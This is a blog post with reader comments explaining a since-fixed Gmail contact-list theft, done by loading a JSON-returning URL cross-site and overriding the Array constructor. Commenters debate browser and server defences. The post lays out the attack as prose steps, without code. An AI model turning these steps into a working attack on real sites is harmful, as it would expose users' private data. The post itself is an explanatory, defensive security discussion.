Interesting Ajax Attack

Jeremiah Grossman recently wrote up a very interesting attack (now fixed) on Gmail, which is worth looking at. The problem was that the Gmail client-side interface got your contact list by doing an XMLHttpRequest to a known URL which was the same for all accounts. The permission checks were, presumably, based entirely on your login cookies. The data arrived in the form of a JavaScript array which the client side then eval()ed. So the attack went like this:

  1. Send the victim’s Gmail account an email with a link you can persuade them to click on, to a page under your control
  2. On that page, have a <script src=”…”> tag accessing the well-known URL for getting the address book
  3. Gmail happily sends back the data, as the person is logged into Gmail and so the request has the correct cookies
  4. Override the anonymous Array() constructor with a function of your choice
  5. When the data arrives, the JS engine calls the anonymous Array constructor (even though it plans to throw away the result, as it’s not assigned to a variable), and therefore calls your function on the address book data, giving you access to it.

Morals:

  • Ajax has new security risks associated with it
  • Don’t put sensitive data in pure JavaScript files with guessable URLs

Hmm. Would it break much of the web if we failed to send cookies on <script> src requests which were cross-domain?

11 thoughts on “Interesting Ajax Attack

  1. That isn’t an Ajax attack, that is simply a url that returns js with all the contact info. This could be achieved with ns 3 :)

    “Hmm. Would it break much of the web if we failed to send cookies on src requests which were cross-domain?”

    Might cause ad agencies some problems, but I think that we might want to try it and see. Or, can we add a way to create cookies that are not sent cross-domain (special flag when creating them, through js or http)?

  2. you forgot another moral: dont login to webmail
    just use an email client, and take a USB key wherever you go.
    – Eldo

  3. > Hmm. Would it break much of the web if we failed to send cookies on src requests which were cross-domain?

    It might affect “unified login systems” but other than that it sounds like a good idea to me.

    Wouldn’t it be nice if the javascript file itself could carry some metadata about which domains were allowed to execute it. Hmm, whilst a little dirty, something like this embedded into the javascript file and understood by browsers could be useful to prevent these kinds of things.

    /**
    * @domain-whitelist mail.google.com, gmail.com
    */

    Or maybe the whitelist could be sent va the http headers?

  4. Doron: By “an Ajax attack”, I meant that Gmail is an Ajax implementation, and therefore exposes sensitive data in the form of a downloadable JavaScript structure – a fairly Ajaxy technique. This attack would work in the NS 3 browser, but not against any of the web apps around at that time.

    adriand: HTTP headers sounds like a good plan to me. Why not allow it for all content? This would allow people to set up a mechanism to stop people embedding their images to steal their bandwidth, for example. They could just set Use-Domain: http://www.mydomain.com, and the browser would refuse to display the image if it was embedded in another site. Would that be a good or a bad thing, I wonder?

  5. > Would that be a good or a bad thing, I wonder?
    Sounds pretty good to me. Of course hotlink prevention can already be achieved with .htaccess rules and such, but doing so adds an extra amount of work for the server. Shifting the duty to the client-side would be welcome.

  6. “Would it break much of the web if we failed to send cookies on src requests which were cross-domain?”
    IE6 already allows the user to block these kind of cookies as part of its P3P support. There were rumors that this behaviour would be the default in IE7.

  7. I dunno how effective client-side remote image blocking would be, you know someone would immediately write an extension to turn it off (and I would be the first to install it).

  8. Justin: But if site owners new that if they were to steal images protected in this way, an unknown proportion of the viewing public simply wouldn’t see them, they are much less likely to do it.

  9. I wonder if the web sites that provide this sort of data service could protect itself by setting a login cookie and checking the referrer header: if the domain/path in the referrer header match an accepted site, then allow it. I know it is possible to spoof referrer, but spoofing that in combination with the login cookie (as long as the login cookie was set to the correct, very narrow domain) seems like it would be enough protection?

    This is assuming the only ways to spoof the referrer is to use a client-side extension/modification to the browser (the system is already compromised, and much more damage can be done than just this issue), or use a proxy that alters the headers. The proxy could be browser configured, but that also seems like a client-side exploit with much more damaging consequences, or the script src request is sent to the hacker’s site, and it adjusts the request to change the referrer. But in that case, the login cookie should not travel since the domains should not match.

    If all of that holds (which it may not), then it seems like it is the responsibility of the data service to adequately protect itself, and not a requirement of the browser to do extra work.